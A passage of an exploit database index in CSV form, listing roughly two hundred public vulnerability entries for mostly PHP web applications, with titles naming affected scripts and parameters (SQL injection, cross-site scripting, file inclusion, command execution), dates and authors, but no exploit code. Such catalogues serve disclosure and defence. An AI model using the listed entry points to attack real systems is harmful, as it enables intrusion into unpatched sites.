Man",webapps,php, +34694,exploits/php/webapps/34694.txt,"Clipbucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,webapps,php, +34699,exploits/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",webapps,php, +34700,exploits/php/webapps/34700.txt,"WebShop Hun 1.062s - '/index.php' Local File Inclusion / Cross-Site Scripting",2009-07-24,u.f.,webapps,php, +34701,exploits/php/webapps/34701.txt,"SkaLinks 1.5 - 'cat' Multiple Cross-Site Scripting Vulnerabilities",2009-07-24,Moudi,webapps,php, +34702,exploits/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,webapps,php, +34703,exploits/php/webapps/34703.txt,"Million Dollar Pixel Ads - Cross-Site Scripting / SQL Injection",2009-07-24,Moudi,webapps,php, +34704,exploits/php/webapps/34704.txt,"MyDLstore Pixel Ad Script - 'payment.php' Cross-Site Scripting",2009-07-21,Moudi,webapps,php, +34705,exploits/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injections",2009-07-21,n3w7u,webapps,php, +34706,exploits/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Remote File Inclusion",2009-07-21,Moudi,webapps,php, +34707,exploits/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,webapps,php, +34708,exploits/php/webapps/34708.pl,"Joomla! Component com_tax - 'eid' SQL Injection",2010-09-23,FL0RiX,webapps,php, +34709,exploits/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34710,exploits/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-21,"599eme Man",webapps,php, +34711,exploits/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php?cid' SQL Injection",2009-08-21,"599eme Man",webapps,php, +34712,exploits/php/webapps/34712.txt,"Freewebscriptz HUBScript - 'single_winner1.php' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34713,exploits/php/webapps/34713.txt,"Freelancers - 'placebid.php?id' Cross-Site Scripting",2009-08-17,Moudi,webapps,php, +34714,exploits/php/webapps/34714.txt,"Freelancers - 'post_resume.php?jobid' Cross-Site Scripting",2009-08-17,Moudi,webapps,php, +34715,exploits/php/webapps/34715.txt,"AdQuick - 'account.php' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34803,exploits/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting",2009-07-09,Moudi,webapps,php, +34804,exploits/php/webapps/34804.txt,"Rentventory - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-07,"599eme Man",webapps,php, +34717,exploits/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,webapps,php, +34718,exploits/php/webapps/34718.txt,"M/Monit 3.3.2 - Cross-Site Request Forgery",2014-09-20,"Dolev Farhi",webapps,php, +34824,exploits/php/webapps/34824.txt,"Lantern CMS - '11-login.asp' Cross-Site Scripting",2010-10-08,"High-Tech Bridge SA",webapps,php, +34825,exploits/php/webapps/34825.html,"Curverider Elgg 1.0 - Templates HTML Injection",2009-06-22,lorddemon,webapps,php, +34826,exploits/php/webapps/34826.html,"OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting",2010-10-08,"Anatolia Security",webapps,php, +34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",webapps,php, +34722,exploits/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injections",2014-09-20,BillV-Lists,webapps,php, +34730,exploits/php/webapps/34730.txt,"DragDropCart - '/assets/js/ddcart.php?sid' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34731,exploits/php/webapps/34731.txt,"DragDropCart - '/includes/ajax/getstate.php?prefix' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34732,exploits/php/webapps/34732.txt,"DragDropCart - 'index.php?search' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34733,exploits/php/webapps/34733.txt,"DragDropCart - 'search.php?search' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34734,exploits/php/webapps/34734.txt,"DragDropCart - 'login.php?redirect' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34735,exploits/php/webapps/34735.txt,"DragDropCart - 'productdetail.php?product' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34736,exploits/php/webapps/34736.txt,"EZArticles - 'articles.php' Cross-Site Scripting",2009-08-20,Moudi,webapps,php, +34737,exploits/php/webapps/34737.txt,"EZodiak - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34738,exploits/php/webapps/34738.txt,"GejoSoft Image Hosting Community - Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34740,exploits/php/webapps/34740.txt,"MyWeight 1.0 - 'user_addfood.php?date' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34741,exploits/php/webapps/34741.txt,"MyWeight 1.0 - 'user_forgot_pwd_form.php?info' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34742,exploits/php/webapps/34742.txt,"MyWeight 1.0 - 'user_login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-20,Moudi,webapps,php, +34743,exploits/php/webapps/34743.txt,"Proxy List Script - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34744,exploits/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds - 'listads.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-20,Moudi,webapps,php, +34745,exploits/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - 'subclass.php?cname' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34746,exploits/php/webapps/34746.txt,"Web TV - 'chn' Cross-Site Scripting",2009-07-20,Moudi,webapps,php, +34747,exploits/php/webapps/34747.txt,"LittleSite 0.1 - 'index.php' Local File Inclusion",2014-09-23,Eolas_Gadai,webapps,php, +40338,exploits/php/webapps/40338.txt,"PHPIPAM 1.2.1 - Multiple Vulnerabilities",2016-09-06,"Saeed reza Zamanian",webapps,php,80 +34748,exploits/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,webapps,php, +34749,exploits/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,webapps,php, +34753,exploits/asp/webapps/34753.py,"Onlineon E-Ticaret - Database Disclosure",2014-09-24,ZoRLu,webapps,asp,80 +34754,exploits/php/webapps/34754.py,"Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",webapps,php,80 +34755,exploits/php/webapps/34755.py,"Joomla! Component com_macgallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",webapps,php,80 +34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80 +34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80 +34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",webapps,php,80 +34761,exploits/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal",2014-09-24,"High-Tech Bridge SA",webapps,php,80 +34762,exploits/php/webapps/34762.txt,"WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,webapps,php,80 +34763,exploits/php/webapps/34763.txt,"OSClass 3.4.1 - 'index.php' Local File Inclusion",2014-09-25,Netsparker,webapps,php,80 +34764,exploits/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",webapps,php,80 +34769,exploits/php/webapps/34769.txt,"MySITE - SQL Injection / Cross-Site Scripting",2010-09-27,MustLive,webapps,php, +34770,exploits/php/webapps/34770.txt,"PHP Scripts Now Hangman - 'index.php?n' SQL Injection",2009-07-21,Moudi,webapps,php, +34771,exploits/php/webapps/34771.txt,"PHP Scripts Now Hangman - 'index.php?letters' Cross-Site Scripting",2009-07-21,Moudi,webapps,php, +34772,exploits/php/webapps/34772.txt,"Honest Traffic - 'msg' Cross-Site Scripting",2009-07-17,Moudi,webapps,php, +34773,exploits/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",webapps,php, +34774,exploits/php/webapps/34774.txt,"HotScripts Type PHP Clone Script - 'feedback.php?msg' Cross-Site Scripting",2009-08-21,Moudi,webapps,php, +34775,exploits/php/webapps/34775.txt,"HotScripts Type PHP Clone Script - 'index.php?msg' Cross-Site Scripting",2009-08-21,Moudi,webapps,php, +34776,exploits/php/webapps/34776.txt,"HotScripts Type PHP Clone Script - 'lostpassword.php?msg' Cross-Site Scripting",2009-08-21,Moudi,webapps,php, +34779,exploits/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",webapps,hardware,80 +34783,exploits/php/webapps/34783.txt,"Scriptsez Ultimate Poll - 'demo_page.php' Cross-Site Scripting",2009-07-16,Moudi,webapps,php, +34784,exploits/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' HTML Injection (1)",2010-09-28,"Veerendra G.G",webapps,php, +34785,exploits/php/webapps/34785.txt,"PHPMyFAQ 2.6.x - 'index.php' Cross-Site Scripting",2010-09-28,"Yam Mesicka",webapps,php, +34786,exploits/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,webapps,php, +34787,exploits/php/webapps/34787.txt,"MODx 2.0.2-pl - '/manager/index.php?modahsh' Cross-Site Scripting",2010-09-29,"John Leitch",webapps,php, +34788,exploits/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",webapps,php, +34789,exploits/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",webapps,php, +34790,exploits/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' HTML Injection",2010-09-29,"High-Tech Bridge SA",webapps,php, +34791,exploits/php/webapps/34791.txt,"Swinger Club Portal - 'start.php?id' SQL Injection",2009-07-07,Moudi,webapps,php, +34792,exploits/php/webapps/34792.txt,"Swinger Club Portal - 'start.php?go' Remote File Inclusion",2009-07-07,Moudi,webapps,php, +34793,exploits/php/webapps/34793.txt,"Top Paidmailer - 'home.php' Remote File Inclusion",2009-07-13,Moudi,webapps,php, +34794,exploits/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products - 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",webapps,cgi, +34795,exploits/php/webapps/34795.txt,"WebAsyst Shop-Script - 'index.php' Cross-Site Scripting",2009-07-09,Vrs-hCk,webapps,php, +34797,exploits/php/webapps/34797.txt,"Surgemail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",webapps,php, +34782,exploits/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' SQL Injection",2010-09-27,RoAd_KiLlEr,webapps,php, +34781,exploits/php/webapps/34781.txt,"WordPress Plugin All In One WP Security 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",webapps,php,80 +34798,exploits/php/webapps/34798.txt,"ITS SCADA - 'Username' SQL Injection",2010-10-04,"Eugene Salov",webapps,php, +34816,exploits/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - Local File Inclusion",2014-09-29,Vulnerability-Lab,webapps,ios, +34800,exploits/php/webapps/34800.txt,"Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",webapps,php, +34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php, +34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php, +34811,exploits/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Cross-Site Scripting",2009-07-08,"599eme Man",webapps,php, +34812,exploits/php/webapps/34812.html,"Docebo 3.6 - 'description' Cross-Site Scripting",2010-10-04,"High-Tech Bridge SA",webapps,php, +34813,exploits/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",webapps,php, +34814,exploits/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",webapps,php, +34820,exploits/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' SQL Injection",2010-10-06,FL0RiX,webapps,php, +34817,exploits/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",webapps,windows, +34818,exploits/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",webapps,php,446 +34975,exploits/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Directory Traversal",2010-11-08,"John Leitch",webapps,php, +34976,exploits/php/webapps/34976.txt,"WordPress Plugin Vodpod Video Gallery 3.1.5 - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",webapps,php, +34977,exploits/php/webapps/34977.txt,"WordPress Plugin jRSS Widget 1.1.1 - 'url' Information Disclosure",2010-11-08,"John Leitch",webapps,php, +34827,exploits/php/webapps/34827.txt,"Recipe Script 5.0 - 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",webapps,php, +34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php, +34833,exploits/php/webapps/34833.txt,"Joomla! / Mambo Component com_trade - 'PID' Cross-Site Scripting",2010-10-11,FL0RiX,webapps,php, +34834,exploits/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",webapps,jsp, +34837,exploits/php/webapps/34837.txt,"Joomla! Component Jstore - 'Controller' Local File Inclusion",2010-10-13,jos_ali_joe,webapps,php, +34839,exploits/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",webapps,cgi, +34840,exploits/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",webapps,php, +34841,exploits/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",webapps,php, +34842,exploits/php/webapps/34842.txt,"TWiki 5.0 - '/bin/view?rev' Cross-Site Scripting",2010-10-14,"DOUHINE Davy",webapps,php, +34843,exploits/php/webapps/34843.txt,"TWiki 5.0 - bin/login Multiple Cross-Site Scripting Vulnerabilities",2010-10-14,"DOUHINE Davy",webapps,php, +34845,exploits/php/webapps/34845.txt,"PHP Photo Vote 1.3F - 'page' Cross-Site Scripting",2009-08-07,Moudi,webapps,php, +34847,exploits/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,webapps,php, +34849,exploits/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Local/Remote File Inclusion",2010-01-19,indoushka,webapps,php, +34850,exploits/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,webapps,php, +34851,exploits/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php?jobid' SQL Injection",2014-10-02,wishnusakti,webapps,php,80 +34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",webapps,windows,80 +34854,exploits/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,webapps,php,80 +34858,exploits/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",webapps,php,80 +34861,exploits/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,webapps,php,80 +34863,exploits/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injections",2014-10-02,Portcullis,webapps,php,80 +34864,exploits/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",webapps,asp,443 +34865,exploits/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authentication Bypass",2014-10-02,"MWR InfoSecurity",webapps,multiple, +34871,exploits/php/webapps/34871.txt,"eCardMAX FormXP - 'survey_result.php' Cross-Site Scripting",2009-07-15,Moudi,webapps,php, +34873,exploits/php/webapps/34873.txt,"Wap-motor - 'image' Directory Traversal",2009-08-27,Inj3ct0r,webapps,php, +34874,exploits/php/webapps/34874.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,MaXe,webapps,php, +34875,exploits/php/webapps/34875.txt,"QuarkMail - 'tf' Directory Traversal",2009-08-28,Securitylab.ir,webapps,php, +34876,exploits/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections",2009-08-27,Moudi,webapps,php, +34877,exploits/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +34878,exploits/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,webapps,php, +34882,exploits/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting / HTML Injection",2010-10-19,"High-Tech Bridge SA",webapps,php, +34883,exploits/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' SQL Injection",2010-10-19,"High-Tech Bridge SA",webapps,php, +34884,exploits/php/webapps/34884.txt,"JCE-Tech SearchFeed Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +34885,exploits/php/webapps/34885.txt,"Auction RSS Content Script - 'rss.php?id' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +34886,exploits/php/webapps/34886.txt,"Auction RSS Content Script - 'search.php?id' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +34887,exploits/php/webapps/34887.txt,"JCE-Tech PHP Video Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php, +34890,exploits/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",webapps,php, +34891,exploits/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' HTML Injection (2)",2010-10-21,"SecPod Research",webapps,php, +34892,exploits/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Cross-Site Scripting",2010-10-21,"Antu Sanadi",webapps,php, +34893,exploits/php/webapps/34893.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' Cross-Site Scripting",2009-07-20,"599eme Man",webapps,php, +34894,exploits/php/webapps/34894.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' SQL Injection",2009-07-20,"599eme Man",webapps,php, +34895,exploits/cgi/webapps/34895.rb,"Bash CGI - Remote Command Injection (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",webapps,cgi, +34922,exploits/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",webapps,php, +35023,exploits/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",webapps,php, +35024,exploits/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,webapps,php, +34902,exploits/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php?searchQuery' Cross-Site Scripting",2009-08-20,Moudi,webapps,php, +34903,exploits/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php?catid' SQL Injection",2009-08-20,Moudi,webapps,php, +34904,exploits/php/webapps/34904.txt,"Radvision Scopia - '/entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",webapps,php, +34905,exploits/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3?bn' Traversal Local File Inclusion",2010-10-22,MustLive,webapps,php, +34906,exploits/php/webapps/34906.txt,"W-Agora 4.2.1 - 'search.php?bn' Cross-Site Scripting",2010-10-22,MustLive,webapps,php, +34907,exploits/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - '/ivt/ivtserver?parm1' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34908,exploits/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/acl?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34909,exploits/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/domain?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34910,exploits/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/group?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34911,exploits/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/gso?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34912,exploits/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/gsogroup?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34913,exploits/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/os?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34914,exploits/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/pop?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34915,exploits/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/rule?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34916,exploits/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/user?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34917,exploits/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/webseal?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple, +34918,exploits/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19/7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",webapps,cgi,443 +34919,exploits/php/webapps/34919.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,webapps,php, +34920,exploits/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure",2014-10-07,"Le Ngoc Son",webapps,asp, +34928,exploits/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",webapps,jsp, +34929,exploits/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting",2014-10-09,"Frank Lycops",webapps,multiple, +34930,exploits/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,webapps,php, +34933,exploits/php/webapps/34933.txt,"Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,webapps,php, +34934,exploits/php/webapps/34934.pl,"Joomla! Component Projects 'com_projects' - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,webapps,php, +34935,exploits/php/webapps/34935.txt,"LES PACKS - 'ID' SQL Injection",2010-10-27,Cru3l.b0y,webapps,php, +34936,exploits/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",webapps,asp, +34937,exploits/php/webapps/34937.txt,"Feindura CMS Groupware - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,webapps,php, +34939,exploits/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Inclusion / Cross-Site Scripting",2010-10-27,MustLive,webapps,php, +34940,exploits/php/webapps/34940.txt,"212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,webapps,php, +34941,exploits/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Cross-Site Scripting",2009-05-25,SmOk3,webapps,php, +34942,exploits/php/webapps/34942.txt,"Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"dave b",webapps,php, +34944,exploits/php/webapps/34944.txt,"SmartOptimizer - Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",webapps,php, +34946,exploits/php/webapps/34946.txt,"WordPress Plugin cformsII 11.5/13.1 - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",webapps,php, +34947,exploits/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection",2010-10-30,MustLive,webapps,php, +34948,exploits/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload / Cross-Site Scripting",2010-11-01,ITSecTeam,webapps,asp, +34951,exploits/php/webapps/34951.txt,"Online Work Order Suite - Login SQL Injection",2010-11-02,VSN,webapps,php, +34955,exploits/php/webapps/34955.txt,"Joomla! 1.5.x - SQL Error Information Disclosure",2010-11-05,"YGN Ethical Hacker Group",webapps,php, +34956,exploits/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,webapps,hardware, +34957,exploits/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Authentication Bypass",2014-10-14,Vulnerability-Lab,webapps,ios, +35022,exploits/php/webapps/35022.txt,"4homepages 4Images 1.7.x - 'categories.php' SQL Injection",2010-11-29,"Ahmed Atif",webapps,php, +34958,exploits/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution",2014-10-14,LiquidWorm,webapps,php, +34959,exploits/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-10-14,LiquidWorm,webapps,php, +34981,exploits/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,webapps,ios, +34965,exploits/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-10-14,"Krusty Hack",webapps,php, +34968,exploits/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,webapps,php, +34969,exploits/hardware/webapps/34969.html,"Tenda A32 Router - Cross-Site Request Forgery",2014-10-14,zixian,webapps,hardware, +34970,exploits/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",webapps,php, +34971,exploits/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting",2010-11-05,"Wesley Kerfoot",webapps,asp, +34972,exploits/php/webapps/34972.txt,"Joomla! Component AutoArticles 3000 - SQL Injection",2010-11-05,jos_ali_joe,webapps,php, +34973,exploits/php/webapps/34973.txt,"WordPress Plugin FeedList 2.61.01 - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",webapps,php, +34974,exploits/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",webapps,php, +34994,exploits/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",webapps,cgi, +34995,exploits/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php, +34984,exploits/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (1)",2014-10-16,fyukyuk,webapps,php, +34988,exploits/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Cross-Site Scripting",2010-11-10,MustLive,webapps,php, +34989,exploits/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",webapps,php, +34990,exploits/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,webapps,php, +34996,exploits/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php, +34992,exploits/php/webapps/34992.txt,"Drupal 